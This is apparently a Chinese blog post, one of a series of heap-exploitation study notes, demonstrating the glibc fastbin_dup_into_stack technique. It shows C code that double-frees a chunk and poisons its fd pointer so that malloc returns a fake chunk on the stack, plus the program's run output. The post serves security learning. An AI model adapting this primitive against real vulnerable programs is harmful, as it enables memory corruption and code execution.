3.fastbin_dup_into_stack

发表于 | 分类于

0x00:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
int main()	{
	unsigned long long stack_var = 0x21;
	fprintf(stderr, "Allocating 3 buffers.\n");
	char *a = malloc(9);
	char *b = malloc(9);
	char *c = malloc(9);
	strcpy(a, "AAAAAAAA");
	strcpy(b, "BBBBBBBB");
	strcpy(c, "CCCCCCCC");
	fprintf(stderr, "1st malloc(9) %p points to %s\n", a, a);
	fprintf(stderr, "2nd malloc(9) %p points to %s\n", b, b);
	fprintf(stderr, "3rd malloc(9) %p points to %s\n", c, c);
	fprintf(stderr, "Freeing the first one %p.\n", a);
	free(a);			
	fprintf(stderr, "Then	freeing another one	%p.\n", b);
	free(b);
	fprintf(stderr, "Freeing the first one %p again.\n", a);
	free(a);
接上

1
2
3
4
5
6
7
8
9
10
11
12
13
14
	fprintf(stderr, "Allocating 4 buffers.\n");
	unsigned long long *d = malloc(9);
	*d = (unsigned long long) ( ( (char*)&stack_var ) - sizeof(d) );
	fprintf(stderr, "4nd malloc(9) %p points to %p\n", d, &d);
	char *e = malloc(9);
	strcpy(e, "EEEEEEEE");
	fprintf(stderr, "5nd malloc(9) %p points to %s\n", e, e);
	char *f = malloc(9);
	strcpy(f, "FFFFFFFF");
	fprintf(stderr, "6rd malloc(9) %p points	to %s\n",	f, f);
	char *g = malloc(9);
	strcpy(g, "GGGGGGGG");
	fprintf(stderr, "7th malloc(9) %p points to %s\n", g, g);
}


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
user@ubuntu:~/workspace/pwn/fastbin_dup_into_stack$ vim fastbin_dup_into_stack.c
user@ubuntu:~/workspace/pwn/fastbin_dup_into_stack$ gcc -g fastbin_dup_into_stack.c -o fastbin_dup_into_stack
user@ubuntu:~/workspace/pwn/fastbin_dup_into_stack$ ./fastbin_dup_into_stack 
Allocating 3 buffers.
1st malloc(9) 0x214b010 points to AAAAAAAA
2nd malloc(9) 0x214b030 points to BBBBBBBB
3rd malloc(9) 0x214b050 points to CCCCCCCC
Freeing the first one 0x214b010.
Then	freeing another one	0x214b030.
Freeing the first one 0x214b010 again.
Allocating 4 buffers.
4nd malloc(9) 0x214b010 points to 0x7ffc8bc6ce40
5nd malloc(9) 0x214b030 points to EEEEEEEE
6rd malloc(9) 0x214b010 points	to FFFFFFFF
7th malloc(9) 0x7ffc8bc6ce40 points to GGGGGGGG

修改fd指针,将其指向一个伪造的free chunk,在伪造的地址处malloc出一个chunk.漏洞也同样是double-free,只有给fd填充的内容不一样. stack_var被我们设置为0x21(或0x20都可以),其实是为了在栈地址减去0x8的时候作为fake chunk的size字段

glibc 在执行分配操作时,若块的大小符合fast bin,则会在对应的bin中寻找合适的块,此时glibc将根据候选块的size字段计算出fastbin索引,然后与对应bin在fastbin中的索引进行比较,如果二者不匹配,则说明块的size字段遭到破坏。所以需要fake chunk的size字段被设置为正确的值。